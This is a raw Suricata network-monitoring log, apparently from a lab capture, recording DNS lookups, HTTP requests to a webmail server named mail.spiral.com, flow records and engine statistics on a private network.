{"timestamp":"2020-02-29T00:07:49.084348+0000","flow_id":1914802374239664,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51696,"proto":"UDP","dns":{"type":"answer","id":47241,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:07:49.166484+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7998}} {"timestamp":"2020-02-29T00:07:50.000246+0000","event_type":"stats","stats":{"uptime":14122,"capture":{"kernel_packets":133873,"kernel_drops":0},"decoder":{"pkts":133891,"bytes":92577100,"invalid":183,"ipv4":132430,"ipv6":8,"ethernet":133891,"raw":0,"null":0,"sll":0,"tcp":127290,"udp":4942,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2717,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2733,"synack":2724,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1760,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2254,"failed_udp":110},"tx":{"http":4551,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2332}},"flow_mgr":{"closed_pruned":2698,"new
_pruned":15,"est_pruned":2304,"bypassed_pruned":0,"flows_checked":8,"flows_notimeout":6,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65528,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19181,"memcap_state":0,"memcap_global":0},"http":{"memuse":105545,"memcap":0}}} {"timestamp":"2020-02-29T00:07:51.409000+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30699,"tx_id":0}} {"timestamp":"2020-02-29T00:07:51.417961+0000","flow_id":872744524144809,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40322,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32979,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:51.525948+0000","flow_id":872744524144809,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40322,"proto":"UDP","dns":{"type":"answer","id":32979,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:51.525948+0000","flow_id":872744524144809,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40322,"proto":"UDP","dns":{"type":"answer","id":32979,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:07:51.606717+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383}} {"timestamp":"2020-02-29T00:07:51.897720+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":35098,"tx_id":1}} {"timestamp":"2020-02-29T00:07:51.908564+0000","flow_id":859382880918804,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1153,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:52.016611+0000","flow_id":859382880918804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60758,"proto":"UDP","dns":{"type":"answer","id":1153,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:07:52.016611+0000","flow_id":859382880918804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60758,"proto":"UDP","dns":{"type":"answer","id":1153,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:52.097412+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:07:52.097516+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903}} {"timestamp":"2020-02-29T00:07:54.171367+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu 
Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7998},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":31377,"tx_id":1}} {"timestamp":"2020-02-29T00:07:57.000166+0000","event_type":"stats","stats":{"uptime":14129,"capture":{"kernel_packets":133931,"kernel_drops":0},"decoder":{"pkts":133933,"bytes":92600525,"invalid":183,"ipv4":132470,"ipv6":8,"ethernet":133933,"raw":0,"null":0,"sll":0,"tcp":127324,"udp":4948,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094752},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2717,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2733,"synack":2724,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1760,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2257,"failed_udp":110},"tx":{"http":4554,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2335}},"flow_mgr":{"closed_pruned":2700,"new_pruned":15,"est_pruned":2307,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19843,"memcap
_state":0,"memcap_global":0},"http":{"memuse":76081,"memcap":0}}} {"timestamp":"2020-02-29T00:07:57.000953+0000","flow_id":1853994208105121,"event_type":"flow","src_ip":"192.168.10.122","src_port":37326,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:56.692897+0000","end":"2020-02-29T00:02:56.798619+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:57.100639+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2334,"tx_id":2}} {"timestamp":"2020-02-29T00:08:02.053815+0000","flow_id":1012670264431159,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9702,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:02.162101+0000","flow_id":1012670264431159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58162,"proto":"UDP","dns":{"type":"answer","id":9702,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:08:02.162101+0000","flow_id":1012670264431159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58162,"proto":"UDP","dns":{"type":"answer","id":9702,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:02.253251+0000","flow_id":1274951032280348,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:08:02.253251+0000","flow_id":1274951032280348,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} 
{"timestamp":"2020-02-29T00:08:03.000491+0000","flow_id":1908200990740010,"event_type":"flow","src_ip":"192.168.10.122","src_port":42172,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:02.101930+0000","end":"2020-02-29T00:03:02.213187+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:04.000248+0000","event_type":"stats","stats":{"uptime":14136,"capture":{"kernel_packets":133933,"kernel_drops":0},"decoder":{"pkts":133936,"bytes":92600723,"invalid":183,"ipv4":132473,"ipv6":8,"ethernet":133936,"raw":0,"null":0,"sll":0,"tcp":127327,"udp":4948,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2717,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2733,"synack":2724,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1760,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2257,"failed_udp":110},"tx":{"http":4554,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2335}},"flow_mgr":{"closed_pruned":2700,"new_pruned":15,"est_pruned":2308,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked"
:65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19512,"memcap_state":0,"memcap_global":0},"http":{"memuse":76074,"memcap":0}}} {"timestamp":"2020-02-29T00:08:06.000428+0000","flow_id":1901152949615255,"event_type":"flow","src_ip":"192.168.10.122","src_port":59490,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:03:05.506519+0000","end":"2020-02-29T00:03:05.617809+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:06.000596+0000","flow_id":2199893709972968,"event_type":"flow","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":20,"bytes_toserver":3061,"bytes_toclient":18001,"start":"2020-02-29T00:06:56.878056+0000","end":"2020-02-29T00:07:05.888377+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:07.254604+0000","flow_id":1274951032280348,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34764,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":613,"tx_id":0}} 
{"timestamp":"2020-02-29T00:08:07.957566+0000","flow_id":483732157340798,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62353,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:07.963657+0000","flow_id":739926956553289,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36865,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47439,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:08.000688+0000","flow_id":2064146958623533,"event_type":"flow","src_ip":"192.168.10.122","src_port":48633,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:07.238381+0000","end":"2020-02-29T00:03:07.343781+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:08.066104+0000","flow_id":483732157340798,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44264,"proto":"UDP","dns":{"type":"answer","id":62353,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:08.066104+0000","flow_id":483732157340798,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44264,"proto":"UDP","dns":{"type":"answer","id":62353,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:08.072093+0000","flow_id":739926956553289,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36865,"proto":"UDP","dns":{"type":"answer","id":47439,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:08:08.072093+0000","flow_id":739926956553289,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36865,"proto":"UDP","dns":{"type":"answer","id":47439,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:08.155844+0000","flow_id":1596077147384852,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34766,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=zwiFi46-w1WbjcxymnmTfV7&uniq=1582934887646","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5164}} {"timestamp":"2020-02-29T00:08:08.292009+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849}} 
{"timestamp":"2020-02-29T00:08:09.000709+0000","flow_id":117556125411825,"event_type":"flow","src_ip":"192.168.10.130","src_port":34752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":24,"bytes_toserver":2365,"bytes_toclient":25319,"start":"2020-02-29T00:06:48.567793+0000","end":"2020-02-29T00:07:08.037208+0000","age":20,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:10.000794+0000","flow_id":2220655566946137,"event_type":"flow","src_ip":"192.168.10.122","src_port":49403,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:03:08.950105+0000","end":"2020-02-29T00:03:09.055838+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:10.644824+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":43729,"tx_id":0}} {"timestamp":"2020-02-29T00:08:10.657157+0000","flow_id":1075243643438853,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46096,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6009,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:08:10.765374+0000","flow_id":1075243643438853,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46096,"proto":"UDP","dns":{"type":"answer","id":6009,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:10.765374+0000","flow_id":1075243643438853,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46096,"proto":"UDP","dns":{"type":"answer","id":6009,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:10.820420+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526}} {"timestamp":"2020-02-29T00:08:10.921548+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36694,"tx_id":1}} 
{"timestamp":"2020-02-29T00:08:10.923541+0000","flow_id":1066967241298197,"event_type":"http","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","length":0}} {"timestamp":"2020-02-29T00:08:11.000184+0000","event_type":"stats","stats":{"uptime":14143,"capture":{"kernel_packets":133962,"kernel_drops":0},"decoder":{"pkts":133984,"bytes":92620708,"invalid":183,"ipv4":132521,"ipv6":8,"ethernet":133984,"raw":0,"null":0,"sll":0,"tcp":127369,"udp":4954,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094752},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2720,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2736,"synack":2727,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1763,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2260,"failed_udp":110},"tx":{"http":4557,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2338}},"flow_mgr":{"closed_pruned":2702,"new_pruned":15,"est_pruned":2311,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout"
